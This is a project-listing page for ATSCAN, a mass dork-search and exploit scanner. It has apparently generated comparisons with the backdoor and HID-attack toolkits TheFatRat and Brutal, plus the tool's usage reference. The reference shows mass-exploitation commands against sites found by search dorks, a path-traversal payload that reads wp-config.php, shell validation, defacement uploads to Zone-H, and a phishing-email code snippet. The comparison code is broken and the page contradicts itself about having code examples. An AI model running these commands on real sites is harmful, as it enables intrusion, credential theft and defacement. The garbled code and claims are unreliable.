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AlisamTechnology logoATSCAN

Advanced dork Search & Mass Exploit Scanner


Top Related Projects

Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection .


Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy . Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device ( Payload Teensy )

Quick Overview

ATSCAN is a powerful and versatile web vulnerability scanner and information gathering tool. It is designed to automate various web-based tasks, such as vulnerability scanning, information gathering, and web application testing.


  • Comprehensive Functionality: ATSCAN provides a wide range of features, including vulnerability scanning, web crawling, SQL injection testing, and more, making it a versatile tool for security professionals.
  • Automation and Efficiency: The tool's ability to automate various tasks can save users a significant amount of time and effort, improving the overall efficiency of the security assessment process.
  • Customizability: ATSCAN allows users to customize the tool's behavior and parameters, enabling them to tailor it to their specific needs and requirements.
  • Active Development: The project is actively maintained, with regular updates and improvements, ensuring that it remains relevant and effective in the ever-evolving cybersecurity landscape.


  • Steep Learning Curve: ATSCAN has a relatively complex interface and a large number of features, which can make it challenging for beginners to get started with the tool.
  • Potential Legal Concerns: As with any security testing tool, the use of ATSCAN may raise legal concerns, especially if it is used without proper authorization or in a malicious manner.
  • Limited Documentation: While the project has an active community, the documentation for ATSCAN could be more comprehensive, making it harder for new users to get started.
  • Potential False Positives: Like many security scanning tools, ATSCAN may occasionally generate false positive results, which can lead to unnecessary time and effort spent investigating non-issues.

Code Examples

Since ATSCAN is not a code library, there are no code examples to provide.

Getting Started

As ATSCAN is not a code library, there are no quick start instructions to include.

Competitor Comparisons

Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection .

Pros of TheFatRat

  • Supports a wide range of payloads, including Windows, Linux, and Android
  • Provides a user-friendly graphical interface for generating and managing payloads
  • Includes features for obfuscating and encrypting payloads to evade detection

Cons of TheFatRat

  • May require more technical knowledge to use effectively compared to ATSCAN
  • Potentially more complex to set up and configure than ATSCAN
  • May have a larger attack surface due to its broader feature set

Code Comparison


def scan_url(self, url, options):
        response = requests.get(url, headers=self.headers, timeout=self.timeout)
        if response.status_code == 200:
            return response.text
            return None
    except requests.exceptions.RequestException as e:
        return None


def generate_payload(self, payload_type, output_file, lhost, lport):
        payload = self.payloads[payload_type].format(lhost=lhost, lport=lport)
        with open(output_file, 'w') as f:
        return output_file
    except KeyError:
        return None

Both ATSCAN and TheFatRat provide functionality for scanning and generating payloads, but they have different approaches and feature sets. ATSCAN is more focused on web application scanning, while TheFatRat is a more general-purpose payload generation tool. The code samples show how each tool handles its respective tasks.


Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy . Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device ( Payload Teensy )

Pros of Brutal

  • Brutal provides a wide range of attack vectors, including social engineering, phishing, and exploitation, making it a versatile tool for security testing.
  • The project is actively maintained and regularly updated, ensuring that it remains effective against the latest threats.
  • Brutal includes a user-friendly interface, making it accessible to both experienced and novice users.

Cons of Brutal

  • Brutal is primarily focused on offensive security, which may raise ethical concerns for some users.
  • The tool's extensive functionality can be overwhelming for users who are new to security testing.
  • Brutal may not be as comprehensive as ATSCAN in terms of the range of features and capabilities.

Code Comparison


def scan_url(self, url, options):
        response = requests.get(url, headers=self.headers, timeout=self.timeout)
        if response.status_code == 200:
            print(f"[+] {url} is up and running!")
            print(f"[-] {url} is down or not responding (status code: {response.status_code})")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error scanning {url}: {e}")


def phishing(self, target, template, sender, subject, message):
        msg = MIMEMultipart()
        msg['From'] = sender
        msg['To'] = target
        msg['Subject'] = subject
        msg.attach(MIMEText(message, 'plain'))
        server = smtplib.SMTP('', 587)
        server.login(sender, self.password)
        print(f"[+] Phishing email sent to {target}")
    except Exception as e:
        print(f"[-] Error sending phishing email: {e}")

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Advanced Mass Search / Dork / Exploitation Scanner

Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent! It is your responsibility to obey laws!

● Engines: [Google apis cache] Bing Ask Yandex Sogou Exalead Shodan
● Mass Dork Search
● Multiple instant scans.
● Mass Exploitation
● Use proxy.
● Random user agent.
● Random engine.
● Mass Extern commands execution.
● Exploits and issues search.
● XSS / SQLI / LFI / AFD scanner.
● Filter wordpress & Joomla sites.
● Wordpress theme and plugin detection.
● Find Admin page.
● Decode / Encode Base64 / MD5

● Ports scan.
● Collect IPs
● Collect E-mails.
● Auto detect errors.
● Auto detect forms.
● Auto detect Cms.
● Post data.
● Auto sequence repeater.
● Validation.
● Post and Get method
● IP Localisation
● Issues and Exploit search
● Interactive and Normal interface.
● And more...

★ Libreries to install:
Perl Required.
Works in all platforms. Disponible in Blackarch and Dracos Linux.
● git clone
● direct link:
chmod +x ./
chmod +x ./
Portable Execution: perl ./
Installed Tool Execution: atscan
Menu: Applications > Web Application analysis > atscan
Repair Tool:
atscan --repair
Uninstall Tool:
atscan --uninstall
--help / -h Help.
--proxy Set tor proxy for scans [EX: --proxy "socks4://localhost:9050"]
Set proxy [EX: --proxy ""]
Set proxy list [EX: --proxy file]
--prandom Random proxy [EX: --prandom file] or --prandom "socks://localhost:9050"]
--motor / -m bing google ask yandex sogou exalead googleapis googlecache or all
--apikey Apikey
--cx Googleapis ID
--mrandom Random of given engines
--brandom Random all disponibles agents
--freq Random time frequency (in seconds)
--time set browser time out
--dork / -d Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
--target / -t Target
--level / -l Scan level (Number of results pages to scan)
--zone Search engine country.
--param / -p Set test parameter EX:id,cat,product_ID
--save / -s Output.
--source Html output file
--bugtraq Serach exploits and issues
--content Print request content
--data Post and Get forms. See examples
--vshell Validate by url ex: --HOST/shell.php or file
--post Use post method
--get Use get method
--header Set headers
--fullHeaders Print full request headers
--host Domain name [Ex:]
--nobanner Hide tool banner
--beep Produce beep sound if positive scan found.
--ifend Produce beep sound when scan process is finished.
--noverbose No scan verbose.
--ping Host ping.
--limit Limit max positive scan results.
--valid / -v Validate by string at least 1 is matching
--validAll Validate all given strings
--status Validate by http header status
--server Validate by server
--ifinurl Get targets with exact string matching
--sregex Get targets with exact regex matching
--exclude Get targets where strings do not exist in html
--excludeAll Get targets where all strings do not exist in html
--unique Get targets with exact dork matching
--replace Replace exact string
--replaceFROM Replace from string to the end of target
--exp / -e Exploit/Payload will be added to full target
--expHost Exploit will be added to the host
--expIp Exploit will be added to the host ip
--xss Xss scan
--sql Sqli scan
--lfi Local file inclusion
--joomrfi Scan for joomla local file inclusion.
--shell Shell link [Ex:]
--wpafd Scan wordpress sites for arbitrary file download
--admin Get site admin page
--shost Get site subdomains
--port port
--tcp TCP port
--udp UDP port
--getlinks Get target html links
--wp Wordpress site
--joom Joomla site
--zip Get zip files
--md5 Convert to md5
--encode64 Encode base64 string
--decode64 decode base64 string
--TARGET Will be replaced by target in extern command
--HOST Will be replaced by host in extern command
--HOSTIP Will be replaced by host IP in extern command
--PORT Will be replaced by open port in extern command
--ips Collect Ips
--geoloc Ip geolocalisation
--regex Crawl to get strings matching regex
--noquery Remove string value from Query url [ex:]
--command / -c Extern Command to execute
--popup Execute Extern Command in new terminal window
--zoneH Upload to Zone-H
--saveCookie Cookies output file
--setCookies Cookie file
--email Collect emails
rang(x-y) EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "" --sql -> 9.
repeat(txt-y) EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --status 200 OR -t ""
In then 9 times
[OTHER] To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
--googleapi Google Apis
--shodan Shodan search
--count Search Shodan without Results
--count Search Shodan
--dnsreverset Shodan Reverse DNS Lookup
--dnsresolve Shodan Resolve DNS Lookup
--tokens String filters and parameters
--querysearch Search the directory of saved Shodan search queries
--query List the saved Shodan search queries
--querytags List the most popular Shodan tags
--myip List all services that Shodan crawls
--services List all services that Shodan crawls
--apinfo My Shodan API Plan Information
--ports List of port numbers that the crawlers are looking for
--protocols List all protocols that can be used when performing on-demand Internet scans via Shodan.
--honeyscore Calculates honeypot score ranging from 0 (not a honeypot) to 1.0 (is a honeypot) in shodan
--facets Shodan search facets
--update Update tool
--repair Repair or force tool update.
--tool / -? Tool info.
--config User configuration.
--interactive / -i Interactive mode interface.
--uninstall Uninstall Tool.
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: --proxy [proxy] Ex: --proxy
or --proxy file Ex: --proxy my_proxies.txt

Random proxy: --prandom [proxy file]
Random browser: --brandom
Random engine: --mrandom [ENGINES]

atscan --dork [dork / dorks.txt] --level [level] --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"
atscan -t target --data "name=>username, email=>xxxxxx, pass=>xxxxx" --post --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"

Search: atscan --dork [dork] --level [level]
Search: atscan -d [dork] -l [level] --getlinks
Set engine: atscan --dork [dork] --level [level] -m bing or google,ask,yandex or all
Set selective engines: atscan -d [dork] -l [level] -m google,bing,..
Search with many dorks: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3] --level [level]
Get Server wordpress sites: atscan -t [target] --wp
Search + output: atscan --dork [dorks.txt] --level [level] --save
Search + get emails: atscan -d [dorks.txt] -l [level] --email
Search + get site emails: atscan --dork --level [level] --email
Search + get ips: atscan --dork [dork] --level [level] --ips

Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'

atscan -t --sql
atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql
atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php"

atscan -t [ip] --port [port] [--udp / --tcp]
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"

Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

Data: atscan -t [target] --data "field1=>value1, field2=>value2, field3=>value3" [--post / --get /]
Exploit: --exp/expHost --data "field1=>value1, field2=>value2, field3=>value3" --vshell [shell path] -v [string] / --status [code] [--post / --get / --upload]
Wordlist: --data "field1=>value1, field2=>WORDLIST:" --vshell [shell path] -v [string] / --status [code] [--post / --get]

atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "file"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 2 -m bing --command "php WP-dl-skin.php-exploit.php --TARGET"
atscan --shodan --search [string] --apikey [API KEY] -command [extern_command]

atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...]

atscan -t [ip/target] --geoloc

atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]
atscan -d [dork / dorks.txt] -l [level] --status [code] / --exclude [string/file]
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --unique
atscan -t [target / targets.txt] [--status [code] / --valid [string]
atscan -t [target / targets.txt] --vshell [file path]
atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]
atscan -t [target / targets.txt] --valid [string] --exclude [string]

atscan -t [target / targets.txt] -v [string] --zoneH "notifier => --HOST/index.php"

atscan --bugtraq -d [string] -l 1 EX: atscan --bugtraq -d wordpress -l 1
atscan --bugtraq -d file.txt -l 1
atscan --bugtraq -d [string] -l 1--limit 10

atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] -v [string]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] --exp [exploit]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] [ANY APTION]

atscan --shodan --targget [ip or host or file] --apikey [API KEY]
atscan --shodan --dork [string or file] --apikey [API KEY]
atscan --shodan --dnsresolve [ip or host or file] --apikey [API KEY]
atscan --shodan --dnsrevese [ip or host or file] --apikey [API KEY]
atscan --shodan --count [query or file] --apikey [API KEY]
atscan --shodan --query --apikey [API KEY]
atscan --shodan --querysearch [query or file] --apikey [API KEY]
atscan --shodan --querytags --apikey [API KEY]
atscan --shodan --myip --apikey [API KEY]
atscan --shodan --apinfo --apikey [API KEY]
atscan --shodan --services --apikey [API KEY]
atscan --shodan --ports --apikey [API KEY]
atscan --shodan --tokens [string or file] --apikey [API KEY]

atscan --update

atscan --uninstall
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